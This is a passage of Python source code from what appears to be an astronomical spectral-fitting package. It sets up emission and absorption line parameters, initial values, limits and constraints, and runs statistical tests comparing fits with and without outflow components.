line_list.pop(line, None)
#
# If fit_absorp=False, purge absorption lines from line_list
for line in list(line_list):
if (comp_options["fit_absorp"]==False) and ("line_type" in line_list[line]) and (line_list[line]["line_type"]=="abs"):
line_list.pop(line, None)
#
# Step 4: Assign the line_profile keyword; if line_profile is not defined, add a keyword for the line profile. If it
# is defined, make sure it is consistent with the comp_options and line_type:
for line in list(line_list):
if ("line_type" in line_list[line]) and (line_list[line]["line_type"]=='na'):
line_list[line]["line_profile"] = comp_options["na_line_profile"]
if ("line_type" in line_list[line]) and (line_list[line]["line_type"]=='br'):
line_list[line]["line_profile"] = comp_options["br_line_profile"]
if ("line_type" in line_list[line]) and (line_list[line]["line_type"]=='out'):
line_list[line]["line_profile"] = comp_options["out_line_profile"]
if ("line_type" in line_list[line]) and (line_list[line]["line_type"]=='abs'):
line_list[line]["line_profile"] = comp_options["abs_line_profile"]
if (("line_type" not in line_list[line]) and ("line_profile" not in line_list[line])) or (("line_type" in line_list[line]) and (line_list[line]["line_type"]=="user") and ("line_profile" not in line_list[line])):
if verbose:
print("\n Warning: %s has no defined line_type or line_profile keywords. Assuming line_profile='G' (Gaussian).\n" % line)
line_list[line]["line_type"] = "user" # User-defined line
line_list[line]["line_profile"] = "G"
if ("line_type" not in line_list[line]) and ("line_profile" in line_list[line]):
line_list[line]["line_type"] = "user" # User-defined line
if ("line_type" in line_list[line]) and (line_list[line]["line_type"] not in ["na","br","out","abs","user"]):
raise ValueError("\n User-input line_type not recognized. Available options are 'na' (narrow), 'br' (broad), 'out' (outflow), or 'abs' (absorption). If unsure, leave out this keyword.\n ")
if ("line_profile" in line_list[line]) and (line_list[line]["line_profile"] not in ["G","L","GH","V"]):
raise ValueError("\n User-input line_profile not recognized. Available options are 'G' (Gaussian), 'L' (Lorentzian), 'GH' (Gauss-Hermite), or 'V' (Voigt). Default is 'G' (Gaussian).\n ")
#
# Step 5: Check parameters based on the defined line profile; any missing "amp", "fwhm", "voff", higher-order
# moment, or "shape" parameters are assumed to be "free", and unnecessary parameters are removed:
for line in list(line_list):
if ("amp" not in line_list[line]): # Assume "free"
line_list[line]["amp"]="free"
if ("fwhm" not in line_list[line]): # Assume "free"
line_list[line]["fwhm"]="free"
if ("voff" not in line_list[line]): # Assume "free"
line_list[line]["voff"]="free"
if (line_list[line]["line_profile"]=="GH") and (comp_options["n_moments"]>2): # If Gauss-Hermite line profile
for m in range(3,3+(comp_options["n_moments"]-2),1):
if ("h"+str(m) not in line_list[line]): # Assume "free"
line_list[line]["h"+str(m)]="free"
if (line_list[line]["line_profile"]=='V'):
if ("shape" not in line_list[line]): # Assume "free"
line_list[line]["shape"]="free"
# Remove unnecessary parameters
# If the line profile is Gauss-Hermite, but the number of higher-order moments is
# less than or equal to 2 (for which the line profile is just Gaussian), remove any
# unnecessary higher-order line parameters that may be in the line dictionary.
if (line_list[line]["line_profile"]=="GH"):
for m in range(comp_options["n_moments"]+1,11,1):
if ("h"+str(m) in line_list[line]):
line_list[line].pop("h"+str(m),None) # Remove unused higher-order moment
if ("h"+str(m)+"_init" in line_list[line]):
line_list[line].pop("h"+str(m)+"_init",None) # Remove unused higher-order moment init
if ("h"+str(m)+"_plim" in line_list[line]):
line_list[line].pop("h"+str(m)+"_plim",None) # Remove unused higher-order moment limits
# If line profile is not Gauss-Hermite, purge all higher-order moments and their parameters
elif (line_list[line]["line_profile"]!="GH"):
for m in range(3,11,1):
if ("h"+str(m) in line_list[line]):
line_list[line].pop("h"+str(m),None) # Remove higher-order moment
if ("h"+str(m)+"_init" in line_list[line]):
line_list[line].pop("h"+str(m)+"_init",None) # Remove higher-order moment init
if ("h"+str(m)+"_plim" in line_list[line]):
line_list[line].pop("h"+str(m)+"_plim",None) # Remove higher-order moment limits
# Purge the unnecessary "shape" parameter if the line profile is not Voigt
if (line_list[line]["line_profile"]!="V") and ("shape" in line_list[line]):
line_list[line].pop("shape",None) # Remove shape key
if (line_list[line]["line_profile"]!="V") and ("shape_init" in line_list[line]):
line_list[line].pop("shape_init",None) # Remove shape init
if (line_list[line]["line_profile"]!="V") and ("shape_plim" in line_list[line]):
line_list[line].pop("shape_plim",None) # Remove shape limits
#
# If tie_line_fwhm=True, line widths (narrow, broad, outflow, and absorption fwhm) are tied within each respective group.
if comp_options["tie_line_fwhm"]:
for line in list(line_list):
# The universal narrow, broad, and outflow widths will be added when parameters are generated
# If h3,h4, or shape parameters are present, remove them
for m in range(3,3+(comp_options["n_moments"]-2),1):
if ("h"+str(m) in line_list[line]):
line_list[line].pop("h"+str(m),None)
if ("shape" in line_list[line]):
line_list[line].pop("shape",None)
# line_list[line].pop("sigma",None) # Removes the key completly
# line_list[line].pop("fwhm",None) # Removes the key completly
# Narrow lines
if ("line_type" in line_list[line]) and (line_list[line]["line_type"]=="na"):
# line_list[line].pop("sigma",None) # Remove sigma key
line_list[line]["fwhm"] = "NA_FWHM" # Replace with fwhm key
# If line profile is Gauss-Hermite, add h3 and h4
if comp_options["na_line_profile"]=="GH":
for m in range(3,3+(comp_options["n_moments"]-2),1):
line_list[line]["h"+str(m)] = "NA_H"+str(m)
if comp_options["na_line_profile"]=="V":
line_list[line]["shape"] = "NA_SHAPE"
# Broad lines
elif ("line_type" in line_list[line]) and (line_list[line]["line_type"]=="br"):
line_list[line]["fwhm"] = "BR_FWHM"
if comp_options["br_line_profile"]=="GH":
for m in range(3,3+(comp_options["n_moments"]-2),1):
line_list[line]["h"+str(m)] = "BR_H"+str(m)
if comp_options["br_line_profile"]=="V":
line_list[line]["shape"] = "BR_SHAPE"
# Outflow lines
elif ("line_type" in line_list[line]) and (line_list[line]["line_type"]=="out"):
line_list[line]["fwhm"] = "OUT_FWHM"
if comp_options["out_line_profile"]=="GH":
for m in range(3,3+(comp_options["n_moments"]-2),1):
line_list[line]["h"+str(m)] = "OUT_H"+str(m)
if comp_options["out_line_profile"]=="V":
line_list[line]["shape"] = "OUT_SHAPE"
# Absorption lines
elif ("line_type" in line_list[line]) and (line_list[line]["line_type"]=="abs"):
line_list[line]["fwhm"] = "ABS_FWHM"
if comp_options["abs_line_profile"]=="GH":
for m in range(3,3+(comp_options["n_moments"]-2),1):
line_list[line]["h"+str(m)] = "ABS_H"+str(m)
if comp_options["abs_line_profile"]=="V":
line_list[line]["shape"] = "ABS_SHAPE"
elif ("line_type" not in line_list[line]) or (line_list[line]["line_type"]=="user"):
if verbose:
print("\n Warning: %s has no line_type keyword specified. Assuming narrow line." % (line))
line_list[line]["fwhm"] = "NA_FWHM"
line_list[line]["line_type"] = "na"
if comp_options["na_line_profile"]=="GH":
for m in range(3,3+(comp_options["n_moments"]-2),1):
line_list[line]["h"+str(m)] = "NA_H"+str(m)
if comp_options["na_line_profile"]=="V":
line_list[line]["shape"] = "NA_SHAPE"
#
# If tie_line_voff=True, line velocity offsets (narrow, broad, outflow, and absorption voff) are tied within each respective group.
if comp_options["tie_line_voff"]:
for line in list(line_list):
# The universal narrow, broad, and outflow voff will be added when parameters are generated
# line_list[line].pop("voff",None) # Removes the key completly
if ("line_type" in line_list[line]) and (line_list[line]["line_type"]=="na"): line_list[line]["voff"] = "NA_VOFF"
elif ("line_type" in line_list[line]) and (line_list[line]["line_type"]=="br"): line_list[line]["voff"] = "BR_VOFF"
elif ("line_type" in line_list[line]) and (line_list[line]["line_type"]=="out"): line_list[line]["voff"] = "OUT_VOFF"
elif ("line_type" in line_list[line]) and (line_list[line]["line_type"]=="abs"): line_list[line]["voff"] = "ABS_VOFF"
elif ("line_type" not in line_list[line]) or (line_list[line]["line_type"]=="user"):
if verbose:
print("\n Warning: %s has no line_type keyword specified. Assuming narrow line." % (line))
line_list[line]["voff"] = "NA_VOFF"
line_list[line]["line_type"] = "na"
#
# Do a final check for valid keywords. If any keywords don't belong, raise an error.
init_hmoments = ["h"+str(m)+"_init" for m in range(3,3+(comp_options["n_moments"]-2),1)]
plim_hmoments = ["h"+str(m)+"_plim" for m in range(3,3+(comp_options["n_moments"]-2),1)]
hmoments = ["h"+str(m) for m in range(3,3+(comp_options["n_moments"]-2),1)]
#
for line in list(line_list):
for key in line_list[line]:
if key not in ["center","center_pix","fwhm_res_kms","fwhm_res_ang","amp","fwhm","voff","shape","line_type","line_profile",
"amp_init","amp_plim","fwhm_init","fwhm_plim","voff_init","voff_plim",
"shape_init","shape_plim","label"]+hmoments+init_hmoments+plim_hmoments:
raise ValueError("\n %s not a valid keyword for the line list! \n" % key)
#
return line_list
##################################################################################
#### Add FWHM Resolution #########################################################
def add_fwhm_res(line_list,lam_gal,fwhm_gal,velscale,verbose=True):
# Perform linear interpolation on the fwhm_gal array as a function of wavelength
# We will use this to determine the fwhm resolution as a function of wavelenth for each
# emission line so we can correct for the resolution at every iteration.
fwhm_gal_ftn = interp1d(lam_gal,fwhm_gal,kind='linear',bounds_error=False,fill_value=(1.e-10,1.e-10))
# Interpolation function that maps x (in angstroms) to pixels so we can get the exact
# location in pixel space of the emission line.
x_pix = np.array(range(len(lam_gal)))
pix_interp_ftn = interp1d(lam_gal,x_pix,kind='linear',bounds_error=False,fill_value=(1.e-10,1.e-10))
# iterate through the line_list and add the keywords
for line in list(line_list):
center = line_list[line]["center"] # line center in Angstroms
center_pix = float(pix_interp_ftn(center)) # line center in pixels
line_list[line]["center_pix"] = center_pix
fwhm_res_ang = float(fwhm_gal_ftn(center)) # instrumental FWHM resolution in angstroms
line_list[line]["fwhm_res_ang"] = fwhm_res_ang
c = 299792.458 # speed of light (km/s)
fwhm_res_kms = (fwhm_res_ang/center)*c # instrumental FWHM resolution in km/s
line_list[line]["fwhm_res_kms"] = fwhm_res_kms
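# Illustrative arithmetic (assumed numbers): an instrumental FWHM of ~2.5 Angstroms at a line
# center of 5000 Angstroms corresponds to (2.5/5000.0)*299792.458 ~ 150 km/s.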
return line_list
##################################################################################
#### Initialize Line Parameters ##################################################
def initialize_line_pars(lam_gal,galaxy,comp_options,line_list,verbose=True):
# Smooth galaxy by a small amount to get rid of
# noise spike (for low S/N spectra)
# galaxy = gaussian_filter1d(galaxy,2.)
def get_init_amp(line_center):
line_center = float(line_center)
try:
return np.nanmax([np.nanmax(galaxy[(lam_gal>(line_center-10.)) & (lam_gal<(line_center+10.))]), 0.0])
except ValueError:
return 0.0
line_par_input = {}
# Initial conditions for some parameters
max_amp = np.nanmax(galaxy)
median_amp = np.nanmedian(galaxy)
opt_feii_amp_init = (0.1*np.nanmedian(galaxy))
uv_iron_amp_init = (0.1*np.nanmedian(galaxy))
balmer_amp_init = (0.1*np.nanmedian(galaxy))
# Default parameter limits for certain line types
# Pre-defined initial values and parameter limits for different line_types.
def amp_hyperpars(line_type,line_center): # amplitude hyperparameters
line_center = float(line_center)
line_window = 10.0 # sampling window for each line in Angstroms
if (line_type in ["na","user"]):
return get_init_amp(line_center), (0.0,max_amp)
elif (line_type in ["br","out"]):
return (get_init_amp(line_center))/2.0, (0.0,max_amp)
elif (line_type=="abs"):
return -median_amp, (-median_amp,0.0,)
#
def fwhm_hyperpars(line_type,line_center,line_profile): # FWHM hyperparameters
na_fwhm_init = 100.0
out_fwhm_init = 450.0
br_fwhm_init = 2500.0
abs_fwhm_init = 500.0
na_fwhm_lim = (0.1 , 800.0)
out_fwhm_lim = (0.1 , 5000.0)
br_fwhm_lim = (500.0, 15000.0)
abs_fwhm_lim = (0.1 , 800.0)
if line_type in ["na","user"]:
if (line_profile=="GH"):
# An exception is granted to line profiles that are Gauss-Hermite, since they need to be
# able to accommodate excess width from an outflow component.
return 250.0, (0.1,3000.0)
else:
return na_fwhm_init, na_fwhm_lim
elif line_type in ["br"]:
return br_fwhm_init, br_fwhm_lim
elif line_type in ["out"]:
return out_fwhm_init, out_fwhm_lim
elif line_type in ["abs"]:
if (line_profile=="GH"):
# An exception is granted to line profiles that are Gauss-Hermite, since they need to be
# able to accommodate excess width from an outflow component.
return 250.0, (0.1,5000.0)
else:
return abs_fwhm_init, abs_fwhm_lim
#
def voff_hyperpars(line_type, line_center):
na_voff_init, br_voff_init = 0.001, 0.001
na_voff_lim = (-1000,1000)
br_voff_lim = (-1000,1000)
if line_type in ["na","user"]:
return na_voff_init, na_voff_lim
elif line_type in ["br","abs","out"]:
return br_voff_init, br_voff_lim
def h_moment_hyperpars():
# Higher-order moments for Gauss-Hermite line profiles
# all start at the same initial value (0) and parameter limits [-0.5,0.5]
# You can specify individual higher-order parameters here.
h_init = 0.0
h_lim = (-0.5,0.5)
return h_init, h_lim
#
def shape_hyperpars(): # shape of the Voigt profile; if line_profile="V" (Voigt)
shape_init = 0.0
shape_lim = (0.0,1.0)
return shape_init, shape_lim
# We start with standard lines and options. These are added one-by-one. We then check specific line options and override any lines that have
# already been added. Parameters are added regardless of component options, as long as the parameter is set to "free".
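# Illustrative example (hypothetical narrow line, default hyperparameters): a line "NA_TEST_5007"
# with amp="free" produces line_par_input["NA_TEST_5007_AMP"] = {"init": <peak flux within
# +/- 10 A of 5007 A>, "plim": (0.0, max_amp)}, following amp_hyperpars() above; the fwhm and voff
# entries are generated analogously from fwhm_hyperpars() and voff_hyperpars().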
for line in list(line_list):
if (("amp" in line_list[line]) and (line_list[line]["amp"]=="free")):
amp_default = amp_hyperpars(line_list[line]["line_type"],line_list[line]["center"])
line_par_input[line+"_AMP"] = {"init": line_list[line].get("amp_init",amp_default[0]),
"plim":line_list[line].get("amp_plim",amp_default[1])}
# Check to make sure init value is within limits of plim
if (line_par_input[line+"_AMP"]["init"]<line_par_input[line+"_AMP"]["plim"][0]) or (line_par_input[line+"_AMP"]["init"]>line_par_input[line+"_AMP"]["plim"][1]):
raise ValueError("\n Amplitude (amp) initial value (amp_init) for %s outside of parameter limits (amp_plim)!\n" % (line))
if (("fwhm" in line_list[line]) and (line_list[line]["fwhm"]=="free")):
fwhm_default = fwhm_hyperpars(line_list[line]["line_type"],line_list[line]["center"],line_list[line]["line_profile"])
line_par_input[line+"_FWHM"] = {"init": line_list[line].get("fwhm_init",fwhm_default[0]),
"plim":line_list[line].get("fwhm_plim",fwhm_default[1])}
# Check to make sure init value is within limits of plim
if (line_par_input[line+"_FWHM"]["init"]<line_par_input[line+"_FWHM"]["plim"][0]) or (line_par_input[line+"_FWHM"]["init"]>line_par_input[line+"_FWHM"]["plim"][1]):
raise ValueError("\n FWHM (fwhm) initial value (fwhm_init) for %s outside of parameter limits (fwhm_plim)!\n" % (line))
if (("voff" in line_list[line]) and (line_list[line]["voff"]=="free")):
voff_default = voff_hyperpars(line_list[line]["line_type"],line_list[line]["center"])
line_par_input[line+"_VOFF"] = {"init": line_list[line].get("voff_init",voff_default[0]),
"plim":line_list[line].get("voff_plim",voff_default[1])}
# Check to make sure init value is within limits of plim
if (line_par_input[line+"_VOFF"]["init"]<line_par_input[line+"_VOFF"]["plim"][0]) or (line_par_input[line+"_VOFF"]["init"]>line_par_input[line+"_VOFF"]["plim"][1]):
raise ValueError("\n Velocity offset (voff) initial value (voff_init) for %s outside of parameter limits (voff_plim)!\n" % (line))
if (line_list[line]["line_profile"]=="GH") & (comp_options["n_moments"]>2):
h_default = h_moment_hyperpars()
for m in range(3,3+(comp_options["n_moments"]-2),1):
if ("h"+str(m) in line_list[line]):
if (line_list[line]["h"+str(m)]=="free"):
line_par_input[line+"_H"+str(m)] = {"init": line_list[line].get("h"+str(m)+"_init",h_default[0]),
"plim":line_list[line].get("h"+str(m)+"_plim",h_default[1])}
# Check to make sure init value is within limits of plim
if (line_par_input[line+"_H"+str(m)]["init"]<line_par_input[line+"_H"+str(m)]["plim"][0]) or (line_par_input[line+"_H"+str(m)]["init"]>line_par_input[line+"_H"+str(m)]["plim"][1]):
raise ValueError("\n Gauss-Hermite moment h%d initial value (h%d_init) for %s outside of parameter limits (h%d_plim)!\n" % (m,m,line,m))
if (("shape" in line_list[line]) and (line_list[line]["shape"]=="free")):
shape_default = shape_hyperpars()
line_par_input[line+"_SHAPE"] = {"init": line_list[line].get("shape_init",shape_default[0]),
"plim":line_list[line].get("shape_plim",shape_default[1])}
# Check to make sure init value is within limits of plim
if (line_par_input[line+"_SHAPE"]["init"]<line_par_input[line+"_SHAPE"]["plim"][0]) or (line_par_input[line+"_SHAPE"]["init"]>line_par_input[line+"_SHAPE"]["plim"][1]):
raise ValueError("\n Voigt profile shape parameter (shape) initial value (shape_init) for %s outside of parameter limits (shape_plim)!\n" % (line))
# If tie_line_fwhm = True, we tie all widths (including any higher order moments) by respective line groups (Na, Br, Out, Abs)
if (comp_options["tie_line_fwhm"]==True):
# Add the common line widths for na,br,out, and abs lines
if (comp_options["fit_narrow"]==True) or ("na" in [line_list[line]["line_type"] for line in line_list]):
line_par_input["NA_FWHM"] = {"init": 250.0,
"plim":(0.0,1200.0)}
if (comp_options["na_line_profile"]=="GH") and (comp_options["n_moments"]>2):
for m in range(3,3+(comp_options["n_moments"]-2),1):
line_par_input["NA_H"+str(m)] = {"init": 0.0,
"plim":(-0.5,0.5)}
if comp_options["na_line_profile"]=="V":
line_par_input["NA_SHAPE"] = {"init": 0.0,
"plim":(0.0,1.0)}
if (comp_options["fit_broad"]==True) or ("br" in [line_list[line]["line_type"] for line in line_list]):
line_par_input["BR_FWHM"] = {"init": 2500.0,
"plim":(500.0,15000.0)}
if (comp_options["br_line_profile"]=="GH") and (comp_options["n_moments"]>2):
for m in range(3,3+(comp_options["n_moments"]-2),1):
line_par_input["BR_H"+str(m)] = {"init": 0.0,
"plim":(-0.5,0.5)}
if comp_options["br_line_profile"]=="V":
line_par_input["BR_SHAPE"] = {"init": 0.0,
"plim":(0.0,1.0)}
if (comp_options["fit_outflow"]==True) or ("out" in [line_list[line]["line_type"] for line in line_list]):
line_par_input["OUT_FWHM"] = {"init": 450.0,
"plim":(0.1,2500.0)}
if (comp_options["out_line_profile"]=="GH") and (comp_options["n_moments"]>2):
for m in range(3,3+(comp_options["n_moments"]-2),1):
line_par_input["OUT_H"+str(m)] = {"init": 0.0,
"plim":(-0.5,0.5)}
if comp_options["out_line_profile"]=="V":
line_par_input["OUT_SHAPE"] = {"init": 0.0,
"plim":(0.0,1.0)}
if (comp_options["fit_absorp"]==True) or ("abs" in [line_list[line]["line_type"] for line in line_list]):
line_par_input["ABS_FWHM"] = {"init": 100.0,
"plim":(0.0,800.0)}
if (comp_options["abs_line_profile"]=="GH") and (comp_options["n_moments"]>2):
for m in range(3,3+(comp_options["n_moments"]-2),1):
line_par_input["ABS_H"+str(m)] = {"init": 0.0,
"plim":(-0.5,0.5)}
if comp_options["abs_line_profile"]=="V":
line_par_input["ABS_SHAPE"] = {"init": 0.0,
"plim":(0.0,1.0)}
# If tie_line_voff = True, we tie all velocity offsets (including any higher order moments) by respective line groups (Na, Br, Out, Abs)
if comp_options["tie_line_voff"]==True:
# Add the common line voffs for na,br,out, and abs lines
if (comp_options["fit_narrow"]==True) or ("na" in [line_list[line]["line_type"] for line in line_list]):
line_par_input["NA_VOFF"] = {"init": 0.0,
"plim":(-500.0,500.0)}
if (comp_options["fit_broad"]==True) or ("br" in [line_list[line]["line_type"] for line in line_list]):
line_par_input["BR_VOFF"] = {"init": 0.0,
"plim":(-1000.0,1000.0)}
if (comp_options["fit_outflow"]==True) or ("out" in [line_list[line]["line_type"] for line in line_list]):
line_par_input["OUT_VOFF"] = {"init": 0.0,
"plim":(-1000.0,1000.0)}
if (comp_options["fit_absorp"]==True) or ("abs" in [line_list[line]["line_type"] for line in line_list]):
line_par_input["ABS_VOFF"] = {"init": 0.0,
"plim":(-500.0,500.0)}
return line_par_input
##################################################################################
#### Check Line Hard Constraints #################################################
def check_hard_cons(lam_gal,galaxy,comp_options,line_list,line_par_input,par_input,verbose=True):
# Get list of all params
# param_dict = {par:0 for par in line_par_input}
param_dict = {par:0 for par in {**par_input,**line_par_input}}
for line in list(line_list):
for hpar in line_list[line]:
if (line_list[line][hpar]!="free") and (hpar in ["amp","fwhm","voff","h3","h4","h5","h6","h7","h8","h9","h10","shape"]):
if (isinstance(line_list[line][hpar],(int,float))):
line_list[line][hpar] = float(line_list[line][hpar])
pass
else:
try:
ne.evaluate(line_list[line][hpar], local_dict = param_dict).item()
except:
if verbose:
print("Hard-constraint %s not found in parameter list or could not be parsed; converting to free parameter.\n" % line_list[line][hpar])
_line_list = {line:line_list[line]}
_line_list[line][hpar]="free"
_line_par_input = initialize_line_pars(lam_gal,galaxy,comp_options,_line_list)
line_par_input = {**_line_par_input,**line_par_input}
return line_list, line_par_input
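# Illustrative example (hypothetical constraint): a tied amplitude such as "OUT_OIII_5007_AMP/2.98"
# is validated by evaluating it with numexpr against a dictionary of all parameter names; if the
# expression references a name that is not present (or cannot be parsed), that hyperparameter is
# converted back to "free" and re-initialized via initialize_line_pars() above.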
##################################################################################
#### Check Line Soft Constraints #################################################
def check_soft_cons(soft_cons,line_par_input,verbose=True):
# par_list = [p for p in line_par_input]
out_cons = []
# print(soft_cons)
# Old method
# for con in soft_cons:
# if (np.all([c in par_list for c in con])):
# out_cons.append(con)
# else:
# if verbose:
# print("\n - %s soft constraint removed because one or more free parameters is not available." % str(con))
# New method
# Map line parameters to init
line_par_dict = {l:line_par_input[l]["init"] for l in line_par_input}
for con in soft_cons:
# print(con)
valid_cons = []
for c in con:
try:
val = ne.evaluate(c,local_dict = line_par_dict).item()
# print(c, val, "True")
valid_cons.append(True)
except KeyError:
valid_cons.append(False)
# print(c, "False")
# print(valid_cons)
if np.all(valid_cons):
out_cons.append(con)
else:
if verbose:
print("\n - %s soft constraint removed because one or more free parameters is not available." % str(con))
# for p in line_par_input:
# print(p)
# print(out_cons)
# sys.exit()
return out_cons
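# Illustrative example (hypothetical constraint): a soft constraint ("BR_H_BETA_FWHM", "NA_OIII_5007_FWHM")
# expresses that the first free parameter should exceed the second (broad H-beta wider than narrow [OIII]);
# it is only retained here if both expressions can be evaluated from the available free parameters,
# otherwise it is dropped with a warning.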
##################################################################################
#### Output Free Parameters ######################################################
def output_free_pars(line_list,par_input,soft_cons):
print("\n----------------------------------------------------------------------------------------------------------------------------------------")
print("\n----------------------------------------------------------------------------------------------------------------------------------------")
print("\n Line List:")
nfree = 0
print("\n----------------------------------------------------------------------------------------------------------------------------------------")
for line in sorted(list(line_list)):
print("{0:<30}{1:<30}{2:<30.2}".format(line, '',''))
for par in sorted(list(line_list[line])):
print("{0:<30}{1:<30}{2:<30}".format('', par,str(line_list[line][par])))
if line_list[line][par]=="free": nfree+=1
print("\n----------------------------------------------------------------------------------------------------------------------------------------")
print("\n Number of Free Line Parameters: %d" % nfree)
print("\n----------------------------------------------------------------------------------------------------------------------------------------")
print("\n All Free Parameters:")
print("\n----------------------------------------------------------------------------------------------------------------------------------------")
nfree = 0
for par in sorted(list(par_input)):
print("{0:<30}{1:<30}{2:<30.2}".format(par, '',''))
nfree+=1
for hpar in sorted(list(par_input[par])):
print("{0:<30}{1:<30}{2:<30}".format('', hpar,str(par_input[par][hpar])))
print("\n----------------------------------------------------------------------------------------------------------------------------------------")
print("\n Total number of free parameters: %d" % nfree)
print("\n----------------------------------------------------------------------------------------------------------------------------------------")
print("\n Soft Constraints:\n")
for con in soft_cons:
print("{0:>30}{1:<0}{2:<0}".format(con[0], ' > ',con[1]))
print("\n----------------------------------------------------------------------------------------------------------------------------------------")
print("\n----------------------------------------------------------------------------------------------------------------------------------------")
return
##################################################################################
#### Outflow Tests ################################################################
def ssr_test(resid_outflow,
resid_no_outflow,
run_dir):
"""
Sum-of-Squares of Residuals (SSR) test:
Computes the sum-of-squares of the residuals of the no-outflow model,
the sum-of-squares of the residuals of the outflow model, and their ratio
for each iteration of the outflow test.
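
Illustrative interpretation (assumed numbers): if the no-outflow model leaves a
sum-of-squares of 120 and the outflow model leaves 60, then ssr_ratio = 120/60 = 2.0;
ratios near 1 indicate that the extra component does not reduce the residuals.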
"""
# For multiple runs
ssr_ratio = np.empty(np.shape(resid_outflow)[0])
ssr_outflow = np.empty(np.shape(resid_outflow)[0])
ssr_no_outflow = np.empty(np.shape(resid_outflow)[0])
for i in range(np.shape(resid_outflow)[0]):
# Compute median and std of residual standard deviations
ssr_resid_outflow = np.sum(resid_outflow[i,:]**2)
ssr_resid_no_outflow = np.sum(resid_no_outflow[i,:]**2)
ssr_ratio[i] = (ssr_resid_no_outflow)/(ssr_resid_outflow) # sum-of-squares ratio
ssr_outflow[i] = ssr_resid_outflow
ssr_no_outflow[i] = ssr_resid_no_outflow
if (np.shape(resid_outflow)[0]>1):
return np.median(ssr_ratio), np.std(ssr_ratio), \
np.median(ssr_no_outflow), np.std(ssr_no_outflow), \
np.median(ssr_outflow), np.std(ssr_outflow)
else:
return ssr_ratio[0], 0.0, ssr_no_outflow[0], 0.0, ssr_outflow[0], 0.0
def f_test(resid_outflow,
resid_no_outflow,
k1,
k2,
run_dir):
"""
f-test:
Performs an F-test for model comparison between a single- and double-component
model for the [OIII] line. An F-test is only accurate for normally-distributed
residuals and should be compared against the Kruskal-Wallis test (for non-normal
distributions), as well as the Bartlett and Levene variance tests. We use the
sum-of-squares of the residuals of each model for the test.
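
Illustrative arithmetic (assumed numbers): with RSS1 = 120 (simpler model), RSS2 = 100
(nested model), k1 = 3, k2 = 6, and n = 200 channels,
F = ((120-100)/(6-3)) / (100/(200-6)) = 6.67/0.515 ~ 12.9,
which is compared against an F-distribution with dfn = 3 and dfd = 194 to obtain the p-value.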
"""
f_stat = np.empty(np.shape(resid_outflow)[0])
f_pval = np.empty(np.shape(resid_outflow)[0])
# k1 = 3.0 # simpler model; single-Gaussian deg. of freedom
# k2 = 6.0 # (nested) complex model; double-Gaussian model deg. of freedom
for i in range(np.shape(resid_outflow)[0]):
RSS1 = np.sum(resid_no_outflow[i,:]**2) # resid. sum of squares single_Gaussian
RSS2 = np.sum(resid_outflow[i,:]**2) # resid. sum of squares double-Gaussian
n = float(len(resid_outflow[i,:]))
dfn = k2 - k1 # deg. of freedom numerator
dfd = n - k2 # deg. of freedom denominator
f_stat[i] = ((RSS1-RSS2)/(k2-k1))/((RSS2)/(n-k2))
f_pval[i] = 1 - f.cdf(f_stat[i], dfn, dfd)
# print('f-statistic model comparison = %0.2f +/- %0.2f, p-value = %0.2e +/- %0.2f' % (np.median(f_stat), np.std(f_stat),np.median(f_pval), np.std(f_pval) ))
# print('f-statistic model comparison = %0.2f ' % (f_stat))
if (len(f_pval)>1):
outflow_conf, outflow_conf_err = 1.0-np.median(f_pval),(1.0-np.median(f_pval))-(1-(np.median(f_pval)+np.std(f_pval)))
return np.median(f_stat), np.std(f_stat), np.median(f_pval), np.std(f_pval), outflow_conf, outflow_conf_err
else:
outflow_conf, outflow_conf_err = 1.0-(f_pval), 0.0
return f_stat[0], 0.0, f_pval[0], 0.0, outflow_conf[0], 0.0
def chi2_metric(eval_ind,
mccomps_outflow,
mccomps_no_outflow):
# Outflow
chi2_outflow_arr = np.empty(np.shape(mccomps_outflow["DATA"])[0])
pval_outflow_arr = np.empty(np.shape(mccomps_outflow["DATA"])[0])
for i in range(np.shape(mccomps_no_outflow["DATA"])[0]):
f_obs = mccomps_outflow["DATA"][i,:][eval_ind]/np.sum(mccomps_outflow["DATA"][i,:][eval_ind])
f_exp = mccomps_outflow["MODEL"][i,:][eval_ind]/np.sum(mccomps_outflow["MODEL"][i,:][eval_ind])
chi2_outflow_arr[i], pval_outflow_arr[i] = chisquare(f_obs=f_obs,
f_exp=f_exp
)
chi2_outflow, chi2_outflow_err = np.median(chi2_outflow_arr), np.std(chi2_outflow_arr)
# No outflow
chi2_no_outflow_arr = np.empty(np.shape(mccomps_no_outflow["DATA"])[0])
pval_no_outflow_arr = np.empty(np.shape(mccomps_no_outflow["DATA"])[0])
for i in range(np.shape(mccomps_no_outflow["DATA"])[0]):
f_obs = mccomps_no_outflow["DATA"][i,:][eval_ind]/np.sum(mccomps_no_outflow["DATA"][i,:][eval_ind])
f_exp = mccomps_no_outflow["MODEL"][i,:][eval_ind]/np.sum(mccomps_no_outflow["MODEL"][i,:][eval_ind])
chi2_no_outflow_arr[i], pval_no_outflow_arr[i] = chisquare(f_obs=f_obs,
f_exp=f_exp
)
chi2_no_outflow, chi2_no_outflow_err = np.median(chi2_no_outflow_arr), np.std(chi2_no_outflow_arr)
# Calculate Ratio
# The ratio of chi-squared values is defined as the improvement of the outflow model over the no-outflow model,
# i.e., 1.0-(chi2_outflow/chi2_no_outflow)
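# Illustrative arithmetic (assumed numbers): chi2_outflow = 1.2 and chi2_no_outflow = 2.0
# give chi2_ratio = 1.0 - (1.2/2.0) = 0.4, i.e., a 40% improvement of the outflow model.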
chi2_ratio = 1.0-(chi2_outflow/chi2_no_outflow)
chi2_ratio_err = chi2_ratio*np.sqrt((chi2_no_outflow_err/chi2_no_outflow)**2+(chi2_outflow_err/chi2_outflow)**2)
return chi2_outflow, chi2_outflow_err, chi2_no_outflow, chi2_no_outflow_err, chi2_ratio, chi2_ratio_err
def bayesian_AB_test(resid_line, resid_no_line, line, wave, noise, data, min_wave, max_wave, eval_ind, nchannel,run_dir):
"""
Performs a Bayesian A/B hypothesis test for the
likelihood distributions for two models.
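
Sketch of the procedure (as implemented below): the best-fit residuals of each model are
perturbed by the per-channel noise many times to build two log-likelihood distributions;
a two-sided p-value for the "line" model is then computed from the Gaussian approximation
of the "no-line" distribution, and the confidence is 1 - p-value.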
"""
# Plot
fig = plt.figure(figsize=(18,10))
gs = gridspec.GridSpec(2, 4)
gs.update(wspace=0.35, hspace=0.35) # set the spacing between axes.
ax1 = plt.subplot(gs[0,0:4])
ax2 = plt.subplot(gs[1,0])
ax3 = plt.subplot(gs[1,1])
ax4 = plt.subplot(gs[1,2])
ax5 = plt.subplot(gs[1,3])
fontsize=16
#
plt.suptitle(r"BADASS A/B Likelihood Comparison Test",fontsize=fontsize)
